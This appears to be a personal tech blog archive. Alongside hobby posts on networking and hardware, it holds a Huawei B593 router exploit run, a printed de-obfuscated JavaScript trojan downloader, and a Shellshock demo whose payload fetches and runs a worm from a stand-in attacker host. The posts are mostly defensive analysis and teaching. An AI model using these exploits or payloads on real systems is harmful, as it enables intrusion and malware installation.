Hacker's ramblings

I have a new version of B593_exploit.pl published. See this article about previous info.

This version has s-22 FTP hack added to it. u-12 has the classic FTP USB-share flaw where it is possible to create a FTP share of the /. Unfortunately in this box Huawei guys made the web GUI a bit smarter, you cannot do such a nice share anymore. The fortunate part is, that the guys don't check for that at the save. If you manage to lure the ../.. past the GUI, you can do it. That's what the exploit is about.

Example run:

./B593_exploit.pl 192.168.1.1 admin --ftp-setup \
  ftpuser ftppassword

That command will share the first USB-device found at the filesystem root of the box. You have to have a physical USB-storage attached. It doesn't have to have anything on it and it won't be affected during the process. But setting a path will fail, if there is no USB-storage.

I had problems with the FTP-client, it kept complaining about FTP passive mode. I switched the client into NcFTP and that solved my problem.

When in the box the SSH passwords are at the classic /var/sshusers.cfg. If configuration is of interest to you, it can be found from /app/curcfg.xml. When the admin user's password is known, it is only a trivial task to SSH into the box and gain a shell access.

While looking around the box, I got carried away with the lteat-command. I managed to brick the box. But that's an another story.)

A reader of this blog contacted me and wanted me to take a look at his Huawei E5186. During the meeting he showed the Field Test mode of his iPhone. I haven't done any iPhone hacks, and had never heard of such thing. In this mode you can see details of the cellular connection. It is completely limited to that, there is no "root"-mode, nor details about Wi-Fi connection, nor details of the phone itself. But if any of the SIM, GSM, UMTS or LTE details are of interest, this one is for you.

Every iPhone has this. Really! There are details of this Field Test mode in The Net from year 2009 (iPhone 3GS), maybe earlier if you'd really want to look close. My iPhone 6 has this, so I'm pretty sure your (whatever model) has it too.

How to get there? Easy. Dial *3001 # 12345#*. Like this:

As a result you will see either the 2G/3G (GSM/UMTS) or 4G (LTE) Field Test menu:

As you can see, the 2G/3G menu has more stuff in it. It is because this is the really old stuff back from the 90s. LTE menu is light, as it is the 2010s spec. Please remember, that it is a snapshot of the situation when menu was opened.

Also notice how there is no more bars on top of the screen, there is a number in dBm. The number will indicate RSSI (in 2G) or RSCP (in 3G) or RSRP (in 4G). See article Some GSM, UMTS and LTE Measurement Units for clarification of the units.

RSSI translation:

• -40 dBm - theorethical max., you won't get this even if you'd be right next to the cell tower
• -50 to -75 dBm - High
• -76 to -90 dBm - Medium
• -91 to -100 dBm - Low
• -101 to -120 dBm - Poor

RSRP translation:

• theorethical max. ? dBm
• -75 and -88 dBm - Very High
• -89 and -96 dBm - High
• -97 and -105 dBm - Medium
• -106 and -112 dBm - Low
• -113 and -125 dBm - Poor

As I didn't find much information about the actual contents of these menus, I'll try to gather here a comprehensive list. Not all of the items have a value in my phone, if there is a value recorded, but I don't know what it is for, there is a ?.

Please help me complete this (at least all the good stuff). If you find something incorrect or missing, please drop me a comment.

I have a policy of running a lot of different browsers on my computers. The idea is to gain experience of what works and what won't. When doing web development, any run-of-the-mill developer gets a tunnel vision and starts spewing out the classic "it works for me!" -style answers, when there are issues with a site.

So, I'm fighting hard to defeat that by using a lot of different browsers. One of my tools has been Maxthon browser. It isn't anymore. Goodbye Maxthon!

I was reading an article about "Lenovo PCs ship with man-in-the-middle adware that breaks HTTPS connections" and went to https://filippo.io/Badfish/ to check my browser. Amazingly it showed YES:

Whaat!

If I download the https://badfish.filippo.io/yes.png directly, then there is a proper notification about the problem:

... but seeing the picture embedded nicely in a website means, that the browser won't bother checking while rendering a page. Anybody can display anything on a web page and I won't get any information about the dropped security. Not good.

There is no other way, than to uninstall. I absolutely won't recommend using anything that insecure!

This one was a tough one for me. Not technically, but mentally. I wrote about Java 1.7 update 51 breaking Cisco ASDM and how to fix it. Two separate users had the same problem, they didn't know how to get their hands on the Cisco certificate which is required.

My dilemma here is:
So, you're in charge of heavy machinery called a firewall, but you don't know how to get a certificate out of a website, huh!
This s a basic task for any security-minded admin, it's obvious that the skills required and skills available are pretty far from each other. Should I give instructions for this basic task, only to postpone the inevitable?

I guess I should.

Method 1: GnuTLS (the best option)

If you happen to have GnuTLS installed, it has an excellent command-line utility. This is mostly in Linux, but I have one running on Windows via Cygwin. Not all Linux distros have this one installed by default. It is easily available on all distros, though.

Example run (information has been omitted for brevity):

# gnutls-cli --print-cert blog.hqcodeshop.fi
Resolving 'blog.hqcodeshop.fi'...
Connecting to '81.22.252.148:443'...
- Certificate type: X.509
- Got a certificate list of 2 certificates.
- Certificate[0] info:
 - subject ..., SHA-1 fingerprint `c87f57f182cd10be0d16b52c5a41c4a915593e6b'
        Public Key Id:
                c6a1e7cd6139f2ec8872e0a198b2a15a26fe1461
        Public key's random art:
                +--[ RSA 2048]----+
                |                 |
                |                 |
                |   E    .        |
                |  . .  o . .     |
                |   .  . S =      |
                |    +  + B o     |
                |ooo+ o  . =      |
                |*=o o .. o       |
                |*o.. o. . .      |
                +-----------------+


-----BEGIN CERTIFICATE-----
MIIEqzCCA5OgAwIBAgIDAih/MA0GCSqGSIb3DQEBCwUAMEcxCzAJBgNVBAYTAlVT
...
nklApvqYviZIwv20nMLwHjtf71ycGZumzNNWQrECBgNWYhFuNyaNe3nzO5fym6o=
-----END CERTIFICATE-----

- Certificate[1] info:
 - subject ..., SHA-1 fingerprint `0e34141846e7423d37f20dc0ab06c9bbd843dc24'

-----BEGIN CERTIFICATE-----
MIIEJTCCAw2gAwIBAgIDAjp3MA0GCSqGSIb3DQEBCwUAMEIxCzAJBgNVBAYTAlVT
...
ZI3NjGFVkP46yl0lD/gdo0p0Vk8aVUBwdSWmMy66S6VdU5oNMOGNX2Esr8zvsJmh
gP8L8mJMcCaY
-----END CERTIFICATE-----

- Status: The certificate is trusted. 
- Description: (TLS1.2-PKIX)-(ECDHE-RSA-SECP256R1)-(AES-128-CBC)-(SHA256)
- Ephemeral EC Diffie-Hellman parameters
 - Using curve: SECP256R1
 - Curve size: 256 bits
- Version: TLS1.2
- Key Exchange: ECDHE-RSA
- Server Signature: RSA-SHA1
- Cipher: AES-128-CBC
- MAC: SHA256
- Compression: NULL
- Handshake was completed

- Simple Client Mode:

Just hit ctrl-d or ctrl-c when the Simple Client Mode -prompt appears. You could actually talk HTTP to the server with that, but for getting the certificate it is not needed. The cert is already out there, just copy it and save it in a file. The 2nd cert is only intermediate CA certificate and it can be downloaded from web.

If you want to see the omitted information, just run the command. A public certificate is as public as anything in the net, there is no point in trying to hide it.

Method 2: OpenSSL (the popular option)

This method will work on any Linux or Mac OS X. There are couple of OpenSSL implementations for Windows, so most boxes should be able to run this one.

Why this isn't the best option is, because OpenSSL client doesn't do proper SNI. In the example below, it returns the wrong certificate. Not the one requested. If your site isn't sharing an IP-address, this will work for you.

Example:

# openssl s_client -connect blog.hqcodeshop.fi:443
CONNECTED(00000003)
depth=2 C = US, O = GeoTrust Inc., CN = GeoTrust Global CA
verify return:1
depth=1 C = US, O = GeoTrust Inc., CN = RapidSSL SHA256 CA - G3
verify return:1
depth=0 OU = GT61328546, ..., CN = *.hqsting.net
verify return:1
---
Certificate chain
 0 s:/OU=GT61328546/.../CN=*.hqsting.net
   i:/C=US/O=GeoTrust Inc./CN=RapidSSL SHA256 CA - G3
 1 s:/C=US/O=GeoTrust, Inc./CN=RapidSSL CA
   i:/C=US/O=GeoTrust Inc./CN=GeoTrust Global CA
---
Server certificate
-----BEGIN CERTIFICATE-----
MIIErjCCA5agAwIBAgIDAit7MA0GCSqGSIb3DQEBCwUAMEcxCzAJBgNVBAYTAlVT
...
TP3W1usGKSJ+fipYhc9ZTUFVs+g3FZ+m3Sltyfb/motM06EP6eq5heDxxPquEhaq
OsY=
-----END CERTIFICATE-----
subject=/OU=GT61328546/.../CN=*.hqsting.net
issuer=/C=US/O=GeoTrust Inc./CN=RapidSSL SHA256 CA - G3
---
No client certificate CA names sent
Server Temp Key: ECDH, prime256v1, 256 bits
---
SSL handshake has read 2921 bytes and written 415 bytes
---
New, TLSv1/SSLv3, Cipher is ECDHE-RSA-AES128-SHA256
Server public key is 2048 bit
Secure Renegotiation IS supported
Compression: NONE
Expansion: NONE
SSL-Session:
    Protocol  : TLSv1.2
    Cipher    : ECDHE-RSA-AES128-SHA256
    Session-ID-ctx: 
    Key-Arg   : None
    Krb5 Principal: None
    PSK identity: None
    PSK identity hint: None
    TLS session ticket lifetime hint: 300 (seconds)
...
    Start Time: 1423326309
    Timeout   : 300 (sec)
    Verify return code: 0 (ok)
---
DONE

Just hit ctrl-d or ctrl-c at the prompt. Again, you're at the HTTP-mode now and could talk to the web-server. The certificate is waiting on the screen to be copied and saved to a file.

Method 3: Firefox (the easy option)

Exporting a certificate of a website is implemented in Firefox browser.

Click the lock-symbol:
A small dialog will open. Select More information:

A big dialog with lot of information about the site will open up. One of the options is to View Certificate. Select it:

Step 4:
Select the bottom sertificate and export it. It will open a save as -dialog:

That's it! Now you have the certificate saved.

Last weekend I went for Serendipity software version 2. This caused lot of downtime as the upgrade didn't go smoothly. I also made the entire server almost choke to a crash as my .htaccess / mod_rewrite -trickery caused looping. My Apache tried to loop itself into an exhaustion.

After I got everything back into shape, I got new toys. Especially the back office -side is vastly improved. On the public-side it seems pretty much the same.

While working on the blog I chose to go HTTPS. That seems to be the industry trend, see HTTPS as a ranking signal. While at it I verified my SHA-256 -signed certificate with Qualsys SSL Labs analysis tool. A certificate signed with less bits is considered as "insecure" nowadays as Google Chrome chooses to dislike your SHA-1 or MD5 -signed certs.

As you already know, I love all kinds of gadgets. When it comes to weather, simply having a reading of outside temperature isn't nearly enough for me. I've had a weather station running for a while, but now that I connected into the on-line world, its time to publish my setup.

The unit I'm running is a WS2357 from La Crosse Technology. They say its a "Pro family" product, but still is very affordable. I paid 150,- € for mine. On the link there's all the tech specs, but it is your basic unit having temperature, pressure, humidity measurements indoors and outdoors. Also for outdoors, there is a wind direction and speed meters and a rain gauge. It is mainly battery powered and data from outside to inside can be transmitted either wirelessly (that's how I do it) or with a wire. Apparently the max. length for the wire would be 20 meters, which exceeds my setup. But for a wireless transmission, the limit is 100 meters. It works well trough house walls.

This is what the outdoors temp, humidity, pressure unit looks like:

This is the "central unit" of outdoors. The size is surprisingly small, but it still holds 2 AA-sized batteries and RJ-11 connectors for wind, rain and indoors. When installed outdoors, it comes with a rain cover which also should insulate it from direct sunlight. This small box is battery powered, but as I never want to climb to my roof to change the batteries, I drilled a small hole for an electric cord, which I soldered into the battery contacts. On the other end of the cord I have a 3,3 VDC transformer acting a battery.

I'm not happy with the temperature measurement, it reacts too fast when sun starts to shine on it. A properly ventilated cover would do better job. In my previous unit this wasn't an issue.

The rain gauge looks like this:

How this operates is very simple. At the bottom of the funnel, there is a small seesaw. When there is enough weight (in form of water) at the seesaw, it will tilt. This empties a cup on the other end and makes the seesaw tilt to the other direction. As it is known exactly how much weight is needed for the action to take place and the area of the unit's intake, it is possible to calculate the amount of water that has rained on that particular area and extrapolate that into WMO specs. On the minus side of the rain gauge, it had zero installation brackets. I ended up gluing it into a metal T-bar connected to my setup.

This is the wind gauge:

With this one I have no complaints. It is very sensitive and seems to give accurate enough readings. Once when weather turned from +2 into -4 it froze for a couple of days. As there was very little wind, the wind direction didn't change at all. Normally wind direction is a scattercloud, but in this instance wind direction was fixed. The problem was solved when wind picked up. So, it wasn't that bad.

This is how my entire setup looks like as installed:

The temperature gauge could be couple of meters higher just to make sure, it wouldn't pick up any extra heat from the roofing on sunny days. I did do some measurements and that could give a boost to my outside temp readings if there is no wind at all.

To get the unit connected into on-line world, I created an account at Weather Underground. I'll transmit the readings from the unit there. To hook the unit up into my Linux-box, I had to a lengthy cable between the indoors unit and my computer. I lucked out with the protocol, as it is RS-232. I simply cut the cable at the D-9 -connector, and soldered an extension cord of 17 meters. The pin ordering is as follows:

The rule-of-thumb max. length for 2400 bps data rate is 60 meters (according to this table), so my cabling worked out perfectly.

For the software at Linux-end I went for Open2300. It is an open-source set of tools to extract necessary information from my station and publish them to The Net. I'm using a simple cron-job for it:

# Weather Underground update
*/10 * * * *  ~/Open2300/wu2300 ~/Open2300/lacrosse.conf

On the Wunderground-end I had major issues. First it didn't receive any of my transmissions. It kept insisting "INVALIDPASSWORDID|Password and/or id are incorrect", which wasn't true. I knew exactly what the password was. After couple of hours, it started working. I'm guessing their data receiving front-end gets the new accounts in a batches, and they are nowhere near real-time.

When my data started flowing, the web-front said:

... which was more than funny. If it wasn't getting any readings, why it says that the most recent one was received a minute ago.

After solving all these minor glitches I was real happy with this setup. Now my station participates in a community of 60k stations all over the world. Also I can check what's the weather like while still keeping my eyes on my precious computer.

Asking for people's password seems to be a very lucrative business. See this clip from Jimmy Kimmel Live: What is Your Password? Of course it is a scripted show and nothing they make you believe happened for real didn't, but still: its very funny one and there is a lot of truth behind that one. People do give out their passwords way too easy.

A while back I wrote about a previous attempt to phish for Apple ID. Also this scam for Google passwords turned out to be a great success for the author of the scam.

Anyway, this time I got an email from Philippines saying:

Dear Apple Customer,

We just need to verify that this email address belongs to you. Simply click the link below and sign in using your Apple ID and password.

Verify Now >

Wondering why you got this email?
It's sent when someone adds or changes a contact email address for an Apple ID account. If you didn't do this, don't worry. Your email address cannot be used as a contact address for an Apple ID without your verification.

For more information, see our frequently asked questions.

Thanks,
Apple Customer Support

The mail looked like this:

This wasn't an especially well executed scam. Scamsters had cracked some innocent (but incapable sysadmin) person's Joomla 2.5.27 installation and injected "bonus" content into it. This is how the site looked like:

Convincing, but only if you keep your eyes out of the address-bar. This is a classic: no HTTPS, quite a weird path. Personally I don't understand how anybody could fall into this trap. Still many do, and get their iPhone contents spread all over the internet.

When discussing with non-security people about these recent account hijackings, I often get a reply of "I don't have anything to hide!". Still my standard reply to that is, "Well, gimme your password, then". They never do.

"A friend" received and e-mail with badly translated text in it. The translation into Finnish was so bad that I couldn't even read it myself. But as always, there was something to lure innocent user to click. A shortened link.

In this case, the link wasn't especially dangerous. It didn't exploit any security flaws or didn't do anything dangerous. It simply landed on some innocent victim's WordPress 3.9.3 site with some "bonus" material injected into it. At the time of writing, latest WP version is 4.1.

The users were presented a "Google Drive login" page:

Would you enter your credentials into that one?

Well ... somebody did. That somebody didn't have 2-factor authentication in use. It resulted in similar spam sent to every single person found from address book or recent e-mails. It is yet to be determined, what else happened.

The login screen is a no-brainer: it has no HTTPS enabled, the address bar clearly states something else than Google, there is no way this site was created or endorsed in any way by Google. All the alarms should be ringing when one sees that kind of page ... but no.

And for god's sake: enable the 2FA now! Even this scam would have been prevented if one would have been in use.

Having a reliable LAN is an essential part of your Internet connection. Going for a wireless solution is fast to build (pretty much plug and use), but as everybody is running one nowadays, the 2,4 GHz band is getting crowded. It is possible to go 5 GHz which is less crowded, has more capacity and is less prone to be blocked by your household microwave oven sending noise to 2 GHz band.

The only real option is to use the wireless toys for mobile devices and tablets, but use old fashioned wired connections for real computers. The catch is, that it is pretty difficult to build and costs more than your average Wi-Fi access point.

Part 1: Planning

What is needed for LAN-build:

• Cabling:
• Lots of it! I rolled over 130 meters of siamese copper cable into my project.
• With siamese cable I get two Ethernet connections on a one cable.
• Patch panel:
• This is the other end of the line. Typically placed into server room or rack.
• Here is the one I got.
• RJ-45 wall sockets:
• This is where you connect your equipment into. I used twin-sockets for twin-cabling.
• The recommendaton I had was to go for LexCom 250 (apparently same as Actassi here). I couldn't use them in my project as they had very long delivery time. They were bit more expensive too, but I've gladly paid for them if only I had gotten any.
• I went for ABB FOT6208 which were easily available. I later learned, that they are not so handy to install as LexCom would be.
• Ethernet switch:
• That will distribute your LAN into every wall socket.
• Any gigabit ethenrnet switch will do, even the cheapest ones.
• I got a HP 1910-24G. It has management via web in it and a fan. When running, the fan makes noise, but I'm placing it in a dedicated room inside a rack, so I need it to function at all temperatures.
• (optional) 19" Rack:
• This is handy for the patch panel and switch. A small 4-5 U telco-sized rack will do.
• This is the one I got.
• Cable routing plan:
• An idea where you can route the cables and where to place the wall sockets.
• Lastly:
• Basic cabling skills and lot of enthusiasm.
• Typical environments will require drilling holes, cutting cables and combing the twisted pairs ouf of them.
• To hide the cables in rooms, I used plastic cord cover. On tight corners I drilled hole into it and used a screw. The cover I used is self-sticking, but I know from experience, that the glue won't stand the test of time. Ethernet cable is quite heavy for any sticker to carry. 

All that should cost less than 1k €.

Part 2: Implementation

I started by drilling couple of holes for the cable. Then I attached the wall sockets into drywall:

This is what my siamese cabling look like:

That's your basic 4 twisted pairs in a cable. In the middle of the cable there is a plus-shaped plastic filler. It makes the cable flex a little bit better. Ethernet cabling shouldn't have too tight corners anyway, but its different story to lure the cable through ceiling or wall if it doesn't give way at all. 

My sockets and RJ-45 connectors are ABB FOT6208 toolless:

It is quite easy to hook one up:

I used T568A pin-to-pair assignment. You can notice that from the connector pic. The colour coding of cables match the upper row at the connector.

My siamese cabling had text on one of them. It was possible to identify the other pair when connecting. See how it contains the amount of meters rolled out:

At the patch panel I have Krone connectors:

A specific tool is required to make the cabling stick:

Even though a single cable is quite thin, the connection is robust. This is how the patch panel will look like when all the pairs have been connected:

I always tested every connection before proceeding:

When confirmation was made, that the connection would work ok, it was time to put the wall socket together:

That was it. It was just about repeating the same thing for every cable and wall socket.

Part 3: Wrap-up

Was it worth it? Absolutely!

Now I have properly functioning gigabit Ethernet in every room at the house. It works so much better at high speeds than any Wi-Fi I've ever tested. 

A collegue really loved my home LAN. He said, that not all businesses have installation of that scale:
"The most overkill home LAN installation"
- Thomas C.

One day I was SSHing into my ArchLinux, but it didn't succeed. The thing didn't even attempt authentication. It said:

Key exchange failed.

No compatible cipher. The server supports these ciphers: AES-128-CTR,AES-192-CTR,AES-256-CTR,aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com

That was surprising. It did work earlier. Ok, Arch is one of those bleeding-edge distros. It does use newest of the new stuff in it. My client is SecureCRT and it has been serving me well for years, actually over decade. I had to confirm the connectivity with Cygwin's OpenSSH client. It worked just fine. Connection opens, no grievance from there. So, something must be wrong with my SecureCRT's settings. This is what the cipher list looked like in Session Options -> Connection -> SSH2 -> Advanced:

Darn! It didn't have the newest big guns enabled. I must have ran too many upgrades to it. Apparently the upgrade doesn't enable that in my settings. I manually changed it into:

... which made the connection succeed.

I checked the server version number and it was OpenSSH_6.7p1. The sshd_config manual says:

Ciphers

The default is:

aes128-ctr,aes192-ctr,aes256-ctr,
aes128-gcm@openssh.com,aes256-gcm@openssh.com,
chacha20-poly1305@openssh.com

Also I found OpenSSH 6.7 release notes saying:

Changes since OpenSSH 6.6
=========================

Potentially-incompatible changes

* sshd(8): The default set of ciphers and MACs has been altered to
   remove unsafe algorithms. In particular, CBC ciphers and arcfour*
   are disabled by default.

So the defaults did change in that upgrade. I checked Fedora 20 defaults and they are:

aes128-ctr,aes192-ctr,aes256-ctr,arcfour256,arcfour128,
aes128-gcm@openssh.com,aes256-gcm@openssh.com,
aes128-cbc,3des-cbc,blowfish-cbc,cast128-cbc,aes192-cbc,
aes256-cbc,arcfour

That explains the change!

Today I got en e-mail from "FedEx" with subject Unable to deliver your item, #000203546. How nice of them! I hadn't ordered anything and wasn't expecting a shipment to arrive. Closer inspection of the e-mail revealed, that it contais a .zip-file and the zip-file contained a single document with extension .doc.js. An obvious scam!

Origins of the e-mail directed to Brazil, where somebody is running a Windows Server 2003 and SMTP-service enabled in it. Apparently, it is mis-configured, or couple of critical security patches weren't installed in time, as now the box is heavily compromised. The specific e-mail address they wanted to reach me is dedicated to domains I own. They are on public record anyway, so somebody could picked up my contact info from any of the domains I have.

The JavaScript-file from zip-file was heavily obfuscated, but in human-readable format it contained something like this:

gvar a1 = '';

function msjk() {
    a1 += 'ave';
    rus();
};

function phqe() {
    a1 += 'cume';
    tzly();
};
...
function jfn() {
    eval(a1);
};
...
function lkgj() {
   a1 += '9.e';
    xnk();
};
vi();

When all those functions are executed to the point of eval(), the de-obfuscated code is something like this:

function dl(fr, fn, rn) {
  var ws = new ActiveXObject("WScript.Shell");
  var fn = ws.ExpandEnvironmentStrings("%TEMP%") + String.fromCharCode(92) + fn;
  var xo = new ActiveXObject("MSXML2.XMLHTTP");
  xo.onreadystatechange =
    function() {
      if (xo.readyState === 4) {
        var xa = new ActiveXObject("ADODB.Stream");
        xa.open();
        xa.type = 1;
        xa.write(xo.ResponseBody);
        xa.position = 0;
        xa.saveToFile(fn, 2);
        xa.close();
      };
    };
  try {
    xo.open("GET", fr, false);
    xo.send();
    if (rn > 0) {
      ws.Run(fn, 0, 0);
    };
  }
  catch (er) {};
};
dl(...);
dl(...);
dl(...);

So, it liked to download and execute 3 files on my computer. However, the code is heavily Internet Explorer -specific and it didn't much work on my Firefox.

The 3 payloads in question download as 1135.jpg, 3711.jpg and 650.jpg, but the JavaScript code will save them as .exe-files. The compromised server where the payload-files are downloaded from is in New Jersey, USA. It is an IIS web server running an application made with .Net. At the time of writing this, the trojan payloads were still being delivered at the address.

The application at payload deployment site has even counter-measures built into it. When I tried downloading the payloads with a wget, it delivered 0 bytes. To get past the check a simple:

wget --user-agent="Mozilla/5.0 (Windows NT 6.3; WOW64; Trident/7.0; rv:11.0) like Gecko"

will work.

All of the payloads are known malware, and when my Windows-box saw them over a network share, it didn't like them and informed me that I have a virus in my computer.

Anyway, as a conclusion the trojan downloader is targeting gullible persons running a version of IE. My virus protection already knew of the downloader, so it isn't much of a threat. Also, this is yet another proof of the importance of server security. The bad news for rest of us is, that those guys need only one badly administered box and they can taint the entire Internet.

The fallout from Shellshock seems to be over, but I ended up in a conversation about SElinux. So, this post is a follow-up on my Helsinki Security Meetup -post about SElinux.

Part 1: Enabling Shellshock

At this point, a flawed Bash isn't available without an intentional downgrade. First check the current version on my CentOS 7:

# rpm -q bash
bash-4.2.45-5.el7_0.4.x86_64

# bash --version
GNU bash, version 4.2.45(1)-release (x86_64-redhat-linux-gnu)

Then do a downgrade (it's amusing how downgrade is done via an upgrade command):

rpm --upgrade -h --oldpackage \
 ftp://ftp.sunet.se/pub/Linux/distributions/centos/7.0.1406/os/x86_64/Packages/bash-4.2.45-5.el7.x86_64.rpm

Then check the version to make sure:

# rpm -q bash
bash-4.2.45-5.el7.x86_64

# bash --version
GNU bash, version 4.2.45(1)-release (x86_64-redhat-linux-gnu)

Somebody really dropped the ball there. It is impossible to determine if shellshock has been fixed or not. The version of Bash won't change! Anyway, the RPM-version tells the truth.

Part 2: The Setup

To act responsibly, I won't show how you can pop the cork of somebody's server. Instead, I created a demo application of my own which contains code similar to known flaws which allow Shellshock to do its dirty deeds.

The basic idea of my demo is to create a TCP-socket -based application to display current date and time on chosen locale. Full C-source code for date_daemon.c is available. From security perspective my code isn't that bad. This time (see the previous SElinux post), it doesn't allow you to run any command you like, but it runs date-comand from bash without any parameters. The part where I mess up, is that I don't sanitize or check the user input. To allow Shellshock to kick in, I'll set the un-sanitized user input into an environment variable LANG. If any sensible locale is entered, it will display the current date and time in the given format.

Example:

Hello there!
Get date at my box by entering your LANG preference and <enter>:
fi_FI
to 13.11.2014 02.43.10 +0200

From SElinux-perspective, I chose to emulate DHCPd-behaviour. There would have been other choices, but ... this time I went this way for a no particular reason. The source code can be compiled with a simple: gcc date_daemon.c -o date_daemon

Then to allow SElinux to kick in a shell-script and specific file-contexts are required. The start script (start.date_daemon.sh) is a very simple:

#!/bin/bash

exec ./date_daemon

Then change the file contexts:

chcon -t dhcpd_exec_t date_daemon
chcon -t initrc_exec_t start.date_daemon.sh

And confirm the result, that everything is set correctly from SElinux-perspective:

# ls -Z

-rwxr-xr-x. root root unconfined_u:object_r:dhcpd_exec_t:s0 date_daemon
-rw-r--r--. root root unconfined_u:object_r:admin_home_t:s0 date_daemon.c
-rwxr--r--. root root unconfined_u:object_r:initrc_exec_t:s0 start.date_daemon.sh

One last thing is that an Enforcing DHCPd cannot bind to any TCP-port you want. As I used TCP/8282, it needs to be allowed:
semanage port --add -t dhcpd_port_t -p tcp 8282

Then it is possible to run the leaky daemon: ./shellshock_test.sh

Finally, we'll confirm, that the process is running in DHCPd-context (in my case, the PID for the process is 25964):

# ps -Z 25964
LABEL                            PID   TTY STAT TIME COMMAND
unconfined_u:system_r:dhcpd_t:s0 25964 ?   S    0:00 ./date_daemon

Remember to make sure, that SElinux is in enforcing-mode. If it isn't it would be the same thing as running without SElinux:

# getenforce
Enforcing

All ok this far, let's move on for the good stuff.

Part 3: The Attack

Now that the sample daemon is running and SElinux is in enforcing-mode, let's run a sample attack on it. The set of commands I made up for this purpose is as follows:

1. Get shellshock'd:
   () { :;};
2. Change into a target directory:
   cd /bin ;
3. Create a temporary shell script injector.sh:
1. rm nasty.worm.sh ;
2. wget --no-verbose --output-document=nasty.worm.sh http://my.evil.site/nasty.worm.sh ;
3. rm injector.sh ;
4. bash nasty.worm.sh
4. Run the injector-script:
   bash injector.sh

The particular nasty worm in this example is a shell-script:

#!/bin/bash

now=$(date)
echo "$now: Your box is pwned!"
echo "$now: Your box is pwned!" >> /tmp/pwn.log
echo "# $now: Your box is pwned!" >> /etc/crontab

It won't do much harm. It simply gets the current date and time into a variable and prints it to standard output, into a log file and finally it modifies crontab-file to simulate a worm keeping itself alive. 

Try injecting a new command into /bin/ (notice, the command in bold is a single line):

$ telnet localhost 8282
Trying 127.0.0.1...
Connected to localhost.
Escape character is '^]'.
Hello there!
Get date at my box by entering your LANG preference and <enter>:
() { :;}; cd /bin ; echo 'rm nasty.worm.sh ; wget --no-verbose --output-document=nasty.worm.sh http://my.evil.site/nasty.worm.sh ; rm injector.sh ; bash nasty.worm.sh' > injector.sh ; bash injector.sh

/bin/bash: injector.sh: Permission denied
bash: injector.sh: No such file or directory
Connection closed by foreign host.

Notice how it will fail on injecting.

Let's try something else. This is a typical comment that I get a lot: "but it can write into /tmp/!". Sure it can, let's try that:

Get date at my box by entering your LANG preference and <enter>:
() { :;}; cd /tmp ; echo 'rm nasty.worm.sh ; wget --no-verbose --output-document=nasty.worm.sh http://my.evil.site/nasty.worm.sh ; rm injector.sh ; bash nasty.worm.sh' > injector.sh ; bash injector.sh
2014-11-13 05:01:35 URL:http://my.evil.site/nasty.worm.sh [156/156] -> "nasty.worm.sh" [1]
Thu Nov 13 05:01:35 EET 2014: Your box is pwned!
nasty.worm.sh: line 6: /etc/crontab: Permission denied
Connection closed by foreign host.

Nice, this time it actually did something. wget ran ok and it actually attempted to inject something. But the fact remains: it still runs with DHCPd-context which means it cannot do much. See:

# ls -Z /tmp/
-rw-r--r--. root root unconfined_u:object_r:dhcpd_tmp_t:s0 nasty.worm.sh
-rw-r--r--. root root unconfined_u:object_r:dhcpd_tmp_t:s0 pwn.log

Even the newly created files are in DHCPd tmp -context, they won't do much harm there.

Part 4: Let's Play what-if, Permissive SElinux

Permissive, Disabled or no SElinux at all will result in something else. Let's weaken the security first:

# setenforce Permissive
# getenforce
Permissive

Like this:

Get date at my box by entering your LANG preference and <enter>:

() { :;}; cd /bin ; echo 'rm nasty.worm.sh ; wget --no-verbose --output-document=nasty.worm.sh http://blog.hqcodeshop.fi/nasty.worm.sh ; rm injector.sh ; bash nasty.worm.sh' > injector.sh ; bash injector.sh

2014-11-13 05:02:30 URL:http://my.evil.site/nasty.worm.sh [156/156] -> "nasty.worm.sh" [1]

Thu Nov 13 05:02:30 EET 2014: Your box is pwned!

Connection closed by foreign host.

Yes, you'll have a brand new command sitting in /bin/:

# ls -Z /bin/nasty.worm.sh
-rw-r--r--. root root unconfined_u:object_r:bin_t:s0   /bin/nasty.worm.sh

Also your crontab will have a nice new row:

# cat /etc/crontab
...
# Thu Nov 13 05:02:30 EET 2014: Your box is pwned!

Not cool!

Part 5: Wrap-up

See: SElinux protects you even if you have software security failing.

Learn it! Love it! :-) 

To make sure my data is properly protected, I keep a habit of lifting off monthly backups from my NAS to an external drive. I have couple of Samsung Story USB-drives dedicated for that purpose. This worked nicely for many years until I hit the brick wall. My combined monthly backup didn't fit the capacity of 1,5 TiB. It sure would be nice to have a "shingled" 8 TiB drive for that kind of storage, but unfortunately they are not available yet. See article New “Shingled” Hard Drives Hold Terabytes For Pennies A Gig.

In case you don't know what a Samsung Story drive is, it looks like this:

What I did was to pop the hood of my Story-drive to see what it had eaten. Very simple setup indeed, I went to a nearby store and got replacement 3 TiB WD Green drives (WD30EZRX).

Here is how the process goes. First pop the hood:

Quirk warning! The aluminium hood is held in place by 4 pieces of T9 Torx screws. The quirk here is, that T9 is not a common size. If you go to an average store, you'll find them having the smallest size of T10 (which is too big for this). Even my Apple repair kit doesn't have a T9, it has T8 and T10 pieces. I've taken apart Nokia phones, and they tend to have weird Torx-sizes, that's why I also have a kit which has T 4, 5, 6, 7, 8, 9 and 10. So, your biggest hurdle is to find a T9 somewhere.

When you have the aluminium cover removed, it'll look like this:

I included a blow-up of the warranty void -disclaimer sticker. I don't think Story drives have been manufactured for a while, so the warranty should be void anyway. Un-surprisingly, inside the box there is a Samsung 3,5" HD-drive, a HD154UI. Under the aluminium hood you will also find a plastic bracket. It just fills up the space making the actual drive fitting nicely and not moving. The bracket has a total of 8 plastic tabs holding it in place. I simply pushed one pair simultaneously from both sides, and I was able to lift the plastic holder up a bit. Then I just moved my fingers to the next pair and it moved more. The plastic thingie will look like this:

When the plastic bracket is gone, you can simply lift the drive upwards. It is held in place only by some rubber tabs, but the drive is essentially loose at this point:

Beware, that the S-ATA to USB -adapter (JMicron) is connected to the front-panel with a wire. That acts as a power on/off -switch for the entire thing. There are 4 wires in the connector, but I think only 2 of them are in use:

It is a pretty common connector and comes off easily by simply pulling it. The next thing is to remove the S-ATA / USB -converter -thingie from the drive. It is attached by a single #1 Phillips screw:

After the scew is gone, the entire converter-board will come loose from S-ATA -connector. Now that you have the hard drive almost completely stripped of all extra goodies, the last thing is to remove the rubber tabs and the kind-of-screws that hold them in place:

The rubber tabs or "pillows" come off by simply pulling them off from the sides. The metal "poles" are another story. They look like #1 Phillips, but the alloy they're made of is of poor quality. You can assume that a screwdriver isn't the primary tool here. I actually used pliers to turn them loose. Now everything is removed from the Samsung-drives, it's time to go big:

